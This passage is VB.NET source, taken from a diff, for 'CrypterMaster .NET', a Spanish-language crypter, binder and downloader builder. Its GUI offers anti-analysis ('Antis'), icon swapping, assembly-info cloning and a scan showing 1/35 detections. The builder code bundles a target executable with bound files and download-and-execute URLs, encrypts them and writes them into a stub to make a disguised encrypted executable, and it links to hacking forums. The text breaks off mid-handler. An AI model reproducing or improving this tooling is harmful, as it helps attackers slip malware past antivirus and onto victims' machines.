||||
Me.chkAssembly.Text = "Clonar Assembly"
|
||||
'
|
||||
'chkIcono
|
||||
'
|
||||
Me.chkIcono.BaseColour = System.Drawing.Color.White
|
||||
Me.chkIcono.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.chkIcono.Checked = False
|
||||
Me.chkIcono.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.chkIcono.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.chkIcono.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.chkIcono.Location = New System.Drawing.Point(10, 46)
|
||||
Me.chkIcono.Name = "chkIcono"
|
||||
Me.chkIcono.Size = New System.Drawing.Size(134, 22)
|
||||
Me.chkIcono.TabIndex = 1
|
||||
Me.chkIcono.Text = "Cambiar Icono"
|
||||
'
|
||||
'chkAntis
|
||||
'
|
||||
Me.chkAntis.BaseColour = System.Drawing.Color.White
|
||||
Me.chkAntis.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.chkAntis.Checked = False
|
||||
Me.chkAntis.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.chkAntis.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.chkAntis.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.chkAntis.Location = New System.Drawing.Point(10, 10)
|
||||
Me.chkAntis.Name = "chkAntis"
|
||||
Me.chkAntis.Size = New System.Drawing.Size(68, 22)
|
||||
Me.chkAntis.TabIndex = 0
|
||||
Me.chkAntis.Text = "Antis"
|
||||
'
|
||||
'tabAcercaDe
|
||||
'
|
||||
Me.tabAcercaDe.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.tabAcercaDe.Controls.Add(Me.PictureBox2)
|
||||
Me.tabAcercaDe.Controls.Add(Me.LinkLabel1)
|
||||
Me.tabAcercaDe.Controls.Add(Me.lblScan)
|
||||
Me.tabAcercaDe.Controls.Add(Me.Label7)
|
||||
Me.tabAcercaDe.Controls.Add(Me.Label6)
|
||||
Me.tabAcercaDe.Controls.Add(Me.Label5)
|
||||
Me.tabAcercaDe.Controls.Add(Me.Label4)
|
||||
Me.tabAcercaDe.Controls.Add(Me.HuraGroupBox2)
|
||||
Me.tabAcercaDe.Location = New System.Drawing.Point(4, 34)
|
||||
Me.tabAcercaDe.Name = "tabAcercaDe"
|
||||
Me.tabAcercaDe.Size = New System.Drawing.Size(654, 123)
|
||||
Me.tabAcercaDe.TabIndex = 4
|
||||
Me.tabAcercaDe.Text = "Acerca de"
|
||||
'
|
||||
'PictureBox2
|
||||
'
|
||||
Me.PictureBox2.Image = CType(resources.GetObject("PictureBox2.Image"), System.Drawing.Image)
|
||||
Me.PictureBox2.Location = New System.Drawing.Point(406, 16)
|
||||
Me.PictureBox2.Name = "PictureBox2"
|
||||
Me.PictureBox2.Size = New System.Drawing.Size(206, 95)
|
||||
Me.PictureBox2.TabIndex = 1
|
||||
Me.PictureBox2.TabStop = False
|
||||
'
|
||||
'LinkLabel1
|
||||
'
|
||||
Me.LinkLabel1.ActiveLinkColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.LinkLabel1.AutoSize = True
|
||||
Me.LinkLabel1.Location = New System.Drawing.Point(240, 12)
|
||||
Me.LinkLabel1.Name = "LinkLabel1"
|
||||
Me.LinkLabel1.Size = New System.Drawing.Size(62, 17)
|
||||
Me.LinkLabel1.TabIndex = 6
|
||||
Me.LinkLabel1.TabStop = True
|
||||
Me.LinkLabel1.Text = "Ver perfil"
|
||||
Me.LinkLabel1.VisitedLinkColor = System.Drawing.Color.Blue
|
||||
'
|
||||
'lblScan
|
||||
'
|
||||
Me.lblScan.ActiveLinkColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.lblScan.AutoSize = True
|
||||
Me.lblScan.Location = New System.Drawing.Point(237, 68)
|
||||
Me.lblScan.Name = "lblScan"
|
||||
Me.lblScan.Size = New System.Drawing.Size(116, 17)
|
||||
Me.lblScan.TabIndex = 5
|
||||
Me.lblScan.TabStop = True
|
||||
Me.lblScan.Text = "Ver scan en MaJyx"
|
||||
Me.lblScan.VisitedLinkColor = System.Drawing.Color.Blue
|
||||
'
|
||||
'Label7
|
||||
'
|
||||
Me.Label7.AutoSize = True
|
||||
Me.Label7.ForeColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.Label7.Location = New System.Drawing.Point(123, 94)
|
||||
Me.Label7.Name = "Label7"
|
||||
Me.Label7.Size = New System.Drawing.Size(191, 17)
|
||||
Me.Label7.TabIndex = 4
|
||||
Me.Label7.Text = "Fecha de analisis: 09/Julio/2014"
|
||||
'
|
||||
'Label6
|
||||
'
|
||||
Me.Label6.AutoSize = True
|
||||
Me.Label6.ForeColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.Label6.Location = New System.Drawing.Point(123, 67)
|
||||
Me.Label6.Name = "Label6"
|
||||
Me.Label6.Size = New System.Drawing.Size(111, 17)
|
||||
Me.Label6.TabIndex = 3
|
||||
Me.Label6.Text = "Detecciones: 1/35"
|
||||
'
|
||||
'Label5
|
||||
'
|
||||
Me.Label5.AutoSize = True
|
||||
Me.Label5.ForeColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.Label5.Location = New System.Drawing.Point(123, 40)
|
||||
Me.Label5.Name = "Label5"
|
||||
Me.Label5.Size = New System.Drawing.Size(109, 17)
|
||||
Me.Label5.TabIndex = 2
|
||||
Me.Label5.Text = "Lenguaje: VB.NET"
|
||||
'
|
||||
'Label4
|
||||
'
|
||||
Me.Label4.AutoSize = True
|
||||
Me.Label4.ForeColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.Label4.Location = New System.Drawing.Point(123, 12)
|
||||
Me.Label4.Name = "Label4"
|
||||
Me.Label4.Size = New System.Drawing.Size(111, 17)
|
||||
Me.Label4.TabIndex = 1
|
||||
Me.Label4.Text = "Coder: chequinho"
|
||||
'
|
||||
'HuraGroupBox2
|
||||
'
|
||||
Me.HuraGroupBox2.BackColor = System.Drawing.Color.White
|
||||
Me.HuraGroupBox2.Controls.Add(Me.PictureBox1)
|
||||
Me.HuraGroupBox2.Location = New System.Drawing.Point(3, 3)
|
||||
Me.HuraGroupBox2.Name = "HuraGroupBox2"
|
||||
Me.HuraGroupBox2.Size = New System.Drawing.Size(117, 117)
|
||||
Me.HuraGroupBox2.TabIndex = 0
|
||||
Me.HuraGroupBox2.Text = "HuraGroupBox2"
|
||||
'
|
||||
'PictureBox1
|
||||
'
|
||||
Me.PictureBox1.Image = CType(resources.GetObject("PictureBox1.Image"), System.Drawing.Image)
|
||||
Me.PictureBox1.Location = New System.Drawing.Point(3, 3)
|
||||
Me.PictureBox1.Name = "PictureBox1"
|
||||
Me.PictureBox1.Size = New System.Drawing.Size(111, 111)
|
||||
Me.PictureBox1.TabIndex = 0
|
||||
Me.PictureBox1.TabStop = False
|
||||
'
|
||||
'HuraControlBox1
|
||||
'
|
||||
Me.HuraControlBox1.AccentColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(178, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.HuraControlBox1.Anchor = CType((System.Windows.Forms.AnchorStyles.Top Or System.Windows.Forms.AnchorStyles.Right), System.Windows.Forms.AnchorStyles)
|
||||
Me.HuraControlBox1.BackColor = System.Drawing.Color.White
|
||||
Me.HuraControlBox1.ColorScheme = CrypterMaster.HuraControlBox.ColorSchemes.Dark
|
||||
Me.HuraControlBox1.ForeColor = System.Drawing.Color.White
|
||||
Me.HuraControlBox1.Location = New System.Drawing.Point(582, 3)
|
||||
Me.HuraControlBox1.Name = "HuraControlBox1"
|
||||
Me.HuraControlBox1.Size = New System.Drawing.Size(100, 25)
|
||||
Me.HuraControlBox1.TabIndex = 2
|
||||
Me.HuraControlBox1.Text = "HuraControlBox1"
|
||||
'
|
||||
'GUI
|
||||
'
|
||||
Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!)
|
||||
Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
|
||||
Me.ClientSize = New System.Drawing.Size(685, 231)
|
||||
Me.Controls.Add(Me.HuraGUI)
|
||||
Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None
|
||||
Me.Icon = CType(resources.GetObject("$this.Icon"), System.Drawing.Icon)
|
||||
Me.Name = "GUI"
|
||||
Me.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen
|
||||
Me.Text = "CrypterMaster .NET"
|
||||
Me.HuraGUI.ResumeLayout(False)
|
||||
Me.tabControl.ResumeLayout(False)
|
||||
Me.TabCrypter.ResumeLayout(False)
|
||||
Me.TabCrypter.PerformLayout()
|
||||
Me.HuraGroupBox1.ResumeLayout(False)
|
||||
Me.HuraGroupBox1.PerformLayout()
|
||||
Me.TabBinder.ResumeLayout(False)
|
||||
Me.HuraGroupBox3.ResumeLayout(False)
|
||||
Me.TabDownloader.ResumeLayout(False)
|
||||
Me.HuraGroupBox4.ResumeLayout(False)
|
||||
Me.tabOpciones.ResumeLayout(False)
|
||||
Me.tabOpciones.PerformLayout()
|
||||
CType(Me.updwnRetraso, System.ComponentModel.ISupportInitialize).EndInit()
|
||||
Me.tabAcercaDe.ResumeLayout(False)
|
||||
Me.tabAcercaDe.PerformLayout()
|
||||
CType(Me.PictureBox2, System.ComponentModel.ISupportInitialize).EndInit()
|
||||
Me.HuraGroupBox2.ResumeLayout(False)
|
||||
CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).EndInit()
|
||||
Me.ResumeLayout(False)
|
||||
|
||||
End Sub
|
||||
Friend WithEvents HuraGUI As CrypterMaster.HuraForm
|
||||
Friend WithEvents HuraControlBox1 As CrypterMaster.HuraControlBox
|
||||
Friend WithEvents tabControl As CrypterMaster.HuraTabControl
|
||||
Friend WithEvents TabCrypter As System.Windows.Forms.TabPage
|
||||
Friend WithEvents TabBinder As System.Windows.Forms.TabPage
|
||||
Friend WithEvents TabDownloader As System.Windows.Forms.TabPage
|
||||
Friend WithEvents tabOpciones As System.Windows.Forms.TabPage
|
||||
Friend WithEvents tabAcercaDe As System.Windows.Forms.TabPage
|
||||
Friend WithEvents txtArchivo_Crypter As CrypterMaster.HuraTextBox
|
||||
Friend WithEvents Label1 As System.Windows.Forms.Label
|
||||
Friend WithEvents btnSeleccionar_Crypter As CrypterMaster.HuraButton
|
||||
Friend WithEvents btnGenerar_Crypter As CrypterMaster.HuraButton
|
||||
Friend WithEvents txtClave_Crypter As CrypterMaster.HuraTextBox
|
||||
Friend WithEvents Label2 As System.Windows.Forms.Label
|
||||
Friend WithEvents HuraGroupBox1 As CrypterMaster.HuraGroupBox
|
||||
Friend WithEvents rbtnUnknown_Crypter As CrypterMaster.HuraRadioButton
|
||||
Friend WithEvents rbtnStairs_Crypter As CrypterMaster.HuraRadioButton
|
||||
Friend WithEvents Label3 As System.Windows.Forms.Label
|
||||
Friend WithEvents HuraGroupBox2 As CrypterMaster.HuraGroupBox
|
||||
Friend WithEvents Label7 As System.Windows.Forms.Label
|
||||
Friend WithEvents Label6 As System.Windows.Forms.Label
|
||||
Friend WithEvents Label5 As System.Windows.Forms.Label
|
||||
Friend WithEvents Label4 As System.Windows.Forms.Label
|
||||
Friend WithEvents PictureBox1 As System.Windows.Forms.PictureBox
|
||||
Friend WithEvents lstArchivos_Binder As System.Windows.Forms.ListView
|
||||
Friend WithEvents comboDrop_Binder As CrypterMaster.HuraComboBox
|
||||
Friend WithEvents HuraGroupBox3 As CrypterMaster.HuraGroupBox
|
||||
Friend WithEvents chkEjecutar_Binder As CrypterMaster.HuraCheckBox
|
||||
Friend WithEvents btnAgregar_Binder As CrypterMaster.HuraButton
|
||||
Friend WithEvents btnQuitar_Binder As CrypterMaster.HuraButton
|
||||
Friend WithEvents colArchivo_Binder As System.Windows.Forms.ColumnHeader
|
||||
Friend WithEvents colEjecutar_Binder As System.Windows.Forms.ColumnHeader
|
||||
Friend WithEvents HuraGroupBox4 As CrypterMaster.HuraGroupBox
|
||||
Friend WithEvents chkEjecutar_Downloader As CrypterMaster.HuraCheckBox
|
||||
Friend WithEvents btnAgregar_Downloader As CrypterMaster.HuraButton
|
||||
Friend WithEvents btnQuitar_Downloader As CrypterMaster.HuraButton
|
||||
Friend WithEvents lstArchivos_Downloader As System.Windows.Forms.ListView
|
||||
Friend WithEvents colURL_Downloader As System.Windows.Forms.ColumnHeader
|
||||
Friend WithEvents colEjecutar_Downloader As System.Windows.Forms.ColumnHeader
|
||||
Friend WithEvents comboDrop_Downloader As CrypterMaster.HuraComboBox
|
||||
Friend WithEvents btnCrear As CrypterMaster.HuraButton
|
||||
Friend WithEvents progressCrear As CrypterMaster.HuraProgressBar
|
||||
Friend WithEvents updwnRetraso As System.Windows.Forms.NumericUpDown
|
||||
Friend WithEvents btnAssembly As CrypterMaster.HuraButton
|
||||
Friend WithEvents btnIcono As CrypterMaster.HuraButton
|
||||
Friend WithEvents chkRetraso As CrypterMaster.HuraCheckBox
|
||||
Friend WithEvents txtAssembly As CrypterMaster.HuraTextBox
|
||||
Friend WithEvents txtIcono As CrypterMaster.HuraTextBox
|
||||
Friend WithEvents chkAssembly As CrypterMaster.HuraCheckBox
|
||||
Friend WithEvents chkIcono As CrypterMaster.HuraCheckBox
|
||||
Friend WithEvents chkAntis As CrypterMaster.HuraCheckBox
|
||||
Friend WithEvents LinkLabel1 As System.Windows.Forms.LinkLabel
|
||||
Friend WithEvents lblScan As System.Windows.Forms.LinkLabel
|
||||
Friend WithEvents dialogCrypter As System.Windows.Forms.OpenFileDialog
|
||||
Friend WithEvents dialogBinder As System.Windows.Forms.OpenFileDialog
|
||||
Friend WithEvents dialogIcono As System.Windows.Forms.OpenFileDialog
|
||||
Friend WithEvents dialogAssembly As System.Windows.Forms.OpenFileDialog
|
||||
Friend WithEvents Label8 As System.Windows.Forms.Label
|
||||
Friend WithEvents colExtension_Downloader As System.Windows.Forms.ColumnHeader
|
||||
Friend WithEvents dialogCrear As System.Windows.Forms.SaveFileDialog
|
||||
Friend WithEvents PictureBox2 As System.Windows.Forms.PictureBox
|
||||
|
||||
End Class
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,310 @@
|
||||
Imports System.Threading
|
||||
Imports System.IO
|
||||
Imports System.Reflection
|
||||
Imports System.Text
|
||||
|
||||
Public Class GUI
|
||||
|
||||
Private Sub GUI_Load(sender As Object, e As EventArgs) Handles Me.Load
|
||||
Me.comboDrop_Binder.SelectedIndex = 0
|
||||
Me.comboDrop_Downloader.SelectedIndex = 0
|
||||
End Sub
|
||||
|
||||
Private Sub btnSeleccionar_Crypter_Click(sender As Object, e As EventArgs) Handles btnSeleccionar_Crypter.Click
|
||||
With dialogCrypter
|
||||
.Title = "Abrir archivo..."
|
||||
.Filter = "Ejecutables (*.exe)|*.exe"
|
||||
.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
|
||||
If .ShowDialog = Windows.Forms.DialogResult.OK Then
|
||||
txtArchivo_Crypter.Text = .FileName
|
||||
Else
|
||||
txtArchivo_Crypter.Text = ""
|
||||
End If
|
||||
End With
|
||||
End Sub
|
||||
|
||||
Private Sub btnAgregar_Binder_Click(sender As Object, e As EventArgs) Handles btnAgregar_Binder.Click
|
||||
With dialogBinder
|
||||
.Title = "Abrir archivo..."
|
||||
.Filter = "Todos (*.*)|*.*"
|
||||
.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
|
||||
If .ShowDialog = Windows.Forms.DialogResult.OK Then lstArchivos_Binder.Items.Add(.FileName).SubItems.Add(True)
|
||||
End With
|
||||
End Sub
|
||||
|
||||
Private Sub lstArchivos_Binder_Click(sender As Object, e As EventArgs) Handles lstArchivos_Binder.SelectedIndexChanged
|
||||
If lstArchivos_Binder.SelectedItems.Count > 0 Then
|
||||
chkEjecutar_Binder.Visible = True
|
||||
Dim itemActual As ListViewItem = lstArchivos_Binder.FocusedItem
|
||||
Dim bEjecutar As Boolean = CBool(itemActual.SubItems.Item(1).Text)
|
||||
chkEjecutar_Binder.Checked = bEjecutar
|
||||
Else
|
||||
chkEjecutar_Binder.Visible = False
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub chkEjecutar_Binder_CheckedChanged(sender As Object) Handles chkEjecutar_Binder.CheckedChanged
|
||||
If lstArchivos_Binder.SelectedItems.Count > 0 Then
|
||||
Dim itemActual As ListViewItem = lstArchivos_Binder.FocusedItem
|
||||
itemActual.SubItems.Item(1).Text = chkEjecutar_Binder.Checked
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub btnQuitar_Binder_Click(sender As Object, e As EventArgs) Handles btnQuitar_Binder.Click
|
||||
If lstArchivos_Binder.SelectedItems.Count > 0 Then
|
||||
Dim itemActual As ListViewItem = lstArchivos_Binder.FocusedItem
|
||||
lstArchivos_Binder.Items.Remove(itemActual)
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub btnAgregar_Downloader_Click(sender As Object, e As EventArgs) Handles btnAgregar_Downloader.Click
|
||||
Dim URL As String = InputBox("Introduzca la URL completa" & vbNewLine & "Ej: http://servidor.com/archivo.ext", "Introduzca la URL")
|
||||
If String.IsNullOrEmpty(URL) Then Exit Sub
|
||||
Dim sExt As String = ExtStr(URL, 2, "/")
|
||||
If sExt = "." & ExtStr(URL, 3, "/") Then
|
||||
sExt = InputBox("Parece que la URL que ingresó no contiene la extensión del archivo a descargar." & vbNewLine & "Introduzca la extensión del archivo (incluyendo el punto (.))" & vbNewLine & "Ej: .ext", "Introduzca la extensión")
|
||||
If Not sExt.StartsWith(".") Then
|
||||
sExt = "." & sExt
|
||||
End If
|
||||
End If
|
||||
With lstArchivos_Downloader.Items.Add(URL)
|
||||
.SubItems.Add(sExt)
|
||||
.SubItems.Add(True)
|
||||
End With
|
||||
End Sub
|
||||
|
||||
Private Sub btnQuitar_Downloader_Click(sender As Object, e As EventArgs) Handles btnQuitar_Downloader.Click
|
||||
If lstArchivos_Downloader.SelectedItems.Count > 0 Then
|
||||
Dim itemActual As ListViewItem = lstArchivos_Downloader.FocusedItem
|
||||
lstArchivos_Downloader.Items.Remove(itemActual)
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub chkEjecutar_Downloader_CheckedChanged(sender As Object) Handles chkEjecutar_Downloader.CheckedChanged
|
||||
If lstArchivos_Downloader.SelectedItems.Count > 0 Then
|
||||
Dim itemActual As ListViewItem = lstArchivos_Downloader.FocusedItem
|
||||
itemActual.SubItems.Item(2).Text = chkEjecutar_Downloader.Checked
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub lstArchivos_Downloader_Click(sender As Object, e As EventArgs) Handles lstArchivos_Downloader.SelectedIndexChanged
|
||||
If lstArchivos_Downloader.SelectedItems.Count > 0 Then
|
||||
chkEjecutar_Downloader.Visible = True
|
||||
Dim itemActual As ListViewItem = lstArchivos_Downloader.FocusedItem
|
||||
Dim bEjecutar As Boolean = CBool(itemActual.SubItems.Item(2).Text)
|
||||
chkEjecutar_Downloader.Checked = bEjecutar
|
||||
Else
|
||||
chkEjecutar_Downloader.Visible = False
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub btnGenerar_Crypter_Click(sender As Object, e As EventArgs) Handles btnGenerar_Crypter.Click
|
||||
For i = 1 To 6
|
||||
txtClave_Crypter.Text = getKey(50)
|
||||
Thread.Sleep(50)
|
||||
Application.DoEvents()
|
||||
Next i
|
||||
End Sub
|
||||
|
||||
Private Sub chkRetraso_CheckedChanged(sender As Object) Handles chkRetraso.CheckedChanged
|
||||
If chkRetraso.Checked Then
|
||||
updwnRetraso.Enabled = True
|
||||
Else
|
||||
updwnRetraso.Enabled = False
|
||||
updwnRetraso.Value = 0
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub chkIcono_CheckedChanged(sender As Object) Handles chkIcono.CheckedChanged
|
||||
txtIcono.Text = ""
|
||||
If chkIcono.Checked Then
|
||||
btnIcono.Enabled = True
|
||||
Else
|
||||
btnIcono.Enabled = False
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub chkAssembly_CheckedChanged(sender As Object) Handles chkAssembly.CheckedChanged
|
||||
txtAssembly.Text = ""
|
||||
If chkAssembly.Checked Then
|
||||
btnAssembly.Enabled = True
|
||||
Else
|
||||
btnAssembly.Enabled = False
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub btnIcono_Click(sender As Object, e As EventArgs) Handles btnIcono.Click
|
||||
With dialogIcono
|
||||
.Title = "Seleccionar icono..."
|
||||
.Filter = "Iconos (*.ico)|*.ico"
|
||||
.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
|
||||
If .ShowDialog = Windows.Forms.DialogResult.OK Then
|
||||
txtIcono.Text = .FileName
|
||||
Else
|
||||
txtIcono.Text = ""
|
||||
End If
|
||||
End With
|
||||
End Sub
|
||||
|
||||
Private Sub btnAssembly_Click(sender As Object, e As EventArgs) Handles btnAssembly.Click
|
||||
With dialogAssembly
|
||||
.Title = "Seleccionar ejecutable..."
|
||||
.Filter = "Ejecutables (*.exe)|*.exe|Librerias (*.dll)|*.dll"
|
||||
.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
|
||||
If .ShowDialog = Windows.Forms.DialogResult.OK Then
|
||||
txtAssembly.Text = .FileName
|
||||
Else
|
||||
txtAssembly.Text = ""
|
||||
End If
|
||||
End With
|
||||
End Sub
|
||||
|
||||
Private Sub LinkLabel1_LinkClicked(sender As Object, e As LinkLabelLinkClickedEventArgs) Handles LinkLabel1.LinkClicked
|
||||
Process.Start("http://foro.udtools.net/member.php?7932-chequinho")
|
||||
Process.Start("http://level-23.cc/forum/member.php?4392-chequinho")
|
||||
Process.Start("http://www.indetectables.net/memberlist.php?mode=viewprofile&u=67773")
|
||||
End Sub
|
||||
|
||||
Private Sub lblScan_LinkClicked(sender As Object, e As LinkLabelLinkClickedEventArgs) Handles lblScan.LinkClicked
|
||||
Process.Start("http://scan.majyx.net/result.php?sid=54465")
|
||||
End Sub
|
||||
|
||||
Private Sub btnCrear_Click(sender As Object, e As EventArgs) Handles btnCrear.Click
|
||||
Try
|
||||
Dim delimitador_master As String = "#._.#"
|
||||
Dim delimitador_crypter As String = "#.__.#"
|
||||
Dim delimitador_binder As String = "#.___.#"
|
||||
Dim delimitador_files_binder = "#.///.#"
|
||||
Dim delimitador_files_ejec_binder As String = ".!!!."
|
||||
Dim delimitador_files_ejec_downloader As String = ".||||."
|
||||
Dim delimitador_downloader As String = "#.____.#"
|
||||
Dim delimitador_files_downloader As String = "#.////.#"
|
||||
Dim stubPath As String = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location) & "\stub.dll"
|
||||
Dim stubBackupPath As String = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location) & "\stub.original"
|
||||
Dim filePath As String = txtArchivo_Crypter.Text
|
||||
Dim iconPath As String = txtIcono.Text
|
||||
Dim assemblyPath As String = txtAssembly.Text
|
||||
Dim filesBinder As String = ""
|
||||
Dim filesDownloader As String = ""
|
||||
Dim stubData As String = ""
|
||||
Dim nuclearData As String = ""
|
||||
Dim encryptedData As String = ""
|
||||
Dim fileData As String = ""
|
||||
Dim crypterData As String = ""
|
||||
Dim binderData As String = ""
|
||||
Dim downloaderData As String = ""
|
||||
Dim sKey As String = txtClave_Crypter.Text
|
||||
|
||||
progressCrear.Value = 10
|
||||
|
||||
If Not My.Computer.FileSystem.FileExists(stubPath) Then
|
||||
MsgBox("Parece que el archivo 'stub.dll' no está aquí...", vbCritical, "Error de Archivo")
|
||||
progressCrear.Value = 0
|
||||
Exit Sub
|
||||
End If
|
||||
If filePath = vbNullString Then
|
||||
MsgBox("No ha seleccionado archivo a cifrar", vbCritical, "Error de Archivo")
|
||||
progressCrear.Value = 0
|
||||
Exit Sub
|
||||
End If
|
||||
|
||||
If chkIcono.Checked Then
|
||||
If iconPath = vbNullString Then
|
||||
MsgBox("No ha seleccionado icono...", vbCritical, "Error de Archivo")
|
||||
progressCrear.Value = 0
|
||||
Exit Sub
|
||||
Else
|
||||
If Not My.Computer.FileSystem.FileExists(stubBackupPath) Then My.Computer.FileSystem.CopyFile(stubPath, stubBackupPath)
|
||||
IconChanger.InjectIcon(stubPath, iconPath)
|
||||
End If
|
||||
End If
|
||||
If chkAssembly.Checked Then
|
||||
If assemblyPath = vbNullString Then
|
||||
MsgBox("No ha seleccionado ejecutable del cual clonar información de ensamblado...", vbCritical, "Error de Archivo")
|
||||
progressCrear.Value = 0
|
||||
Exit Sub
|
||||
Else
|
||||
If Not My.Computer.FileSystem.FileExists(stubBackupPath) Then My.Computer.FileSystem.CopyFile(stubPath, stubBackupPath)
|
||||
cloneInfo(assemblyPath, stubPath)
|
||||
End If
|
||||
End If
|
||||
|
||||
progressCrear.Value = 20
|
||||
|
||||
fileData = ReadFile(filePath)
|
||||
|
||||
crypterData = fileData & delimitador_crypter & chkAntis.Checked & delimitador_crypter & updwnRetraso.Value & delimitador_crypter
|
||||
|
||||
progressCrear.Value = 30
|
||||
|
||||
If lstArchivos_Binder.Items.Count > 0 Then
|
||||
For i = 0 To (lstArchivos_Binder.Items.Count - 1)
|
||||
Dim currentBinderItem As ListViewItem = lstArchivos_Binder.Items.Item(i)
|
||||
Dim currentBinderFilePath As String = currentBinderItem.Text
|
||||
Dim currentBinderFileData As String = ReadFile(currentBinderFilePath)
|
||||
Dim currentBinderExt As String = ExtStr(currentBinderFilePath, 2)
|
||||
Dim currentBinderExec As Boolean = CBool(currentBinderItem.SubItems(1).Text)
|
||||
Dim currentBinderData As String = currentBinderFileData & delimitador_files_ejec_binder & currentBinderExt & delimitador_files_ejec_binder & currentBinderExec
|
||||
filesBinder &= currentBinderData & delimitador_files_binder
|
||||
Next
|
||||
binderData = filesBinder & delimitador_binder & comboDrop_Binder.Text & delimitador_binder
|
||||
Else
|
||||
binderData = "NO_DATA"
|
||||
End If
|
||||
|
||||
progressCrear.Value = 40
|
||||
|
||||
If lstArchivos_Downloader.Items.Count > 0 Then
|
||||
For i = 0 To (lstArchivos_Downloader.Items.Count - 1)
|
||||
Dim currentDownloaderItem As ListViewItem = lstArchivos_Downloader.Items.Item(i)
|
||||
Dim currentDownloaderURL As String = currentDownloaderItem.Text
|
||||
Dim currentDownloaderExt As String = currentDownloaderItem.SubItems(1).Text
|
||||
Dim currentDownloaderExec As Boolean = CBool(currentDownloaderItem.SubItems(2).Text)
|
||||
Dim currentDownloaderData As String = currentDownloaderURL & delimitador_files_ejec_downloader & currentDownloaderExt & delimitador_files_ejec_downloader & currentDownloaderExec
|
||||
filesDownloader &= currentDownloaderData & delimitador_files_downloader
|
||||
Next
|
||||
downloaderData = filesDownloader & delimitador_downloader & comboDrop_Downloader.Text & delimitador_downloader
|
||||
Else
|
||||
downloaderData = "NO_DATA"
|
||||
End If
|
||||
|
||||
progressCrear.Value = 50
|
||||
|
||||
stubData = ReadFile(stubPath)
|
||||
|
||||
nuclearData = crypterData & delimitador_master & binderData & delimitador_master & downloaderData & delimitador_master
|
||||
|
||||
progressCrear.Value = 60
|
||||
|
||||
If rbtnUnknown_Crypter.Checked Then
|
||||
encryptedData = stubData & delimitador_master & Unknown(nuclearData, sKey) & delimitador_master & sKey & delimitador_master & "1" & delimitador_master
|
||||
ElseIf rbtnStairs_Crypter.Checked Then
|
||||
encryptedData = stubData & delimitador_master & Stairs(nuclearData, sKey) & delimitador_master & sKey & delimitador_master & "2" & delimitador_master
|
||||
End If
|
||||
|
||||
progressCrear.Value = 70
|
||||
|
||||
With dialogCrear
|
||||
.FileName = ExtStr(filePath, 1) & ".enc"
|
||||
.Title = "Guardar ejecutable cifrado..."
|
||||
.Filter = "Ejecutables (*.exe)|*.exe"
|
||||
.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
|
||||
If .ShowDialog = Windows.Forms.DialogResult.OK Then
|
||||
WriteFile(.FileName, encryptedData)
|
||||
progressCrear.Value = 80
|
||||
progressCrear.Value = 90
|
||||
If My.Computer.FileSystem.FileExists(stubBackupPath) Then
|
||||
My.Computer.FileSystem.DeleteFile(stubPath)
|
||||
My.Computer.FileSystem.RenameFile(stubBackupPath, ExtStr(stubPath, 3))
|
||||
End If
|
||||
progressCrear.Value = 100
|
||||
MsgBox("¡Ejecutable cifrado correctamente!", MsgBoxStyle.Information + MsgBoxStyle.OkOnly, "Correcto")
|
||||
End If
|
||||
progressCrear.Value = 0
|
||||
End With
|
||||
Catch ex As Exception
|
||||
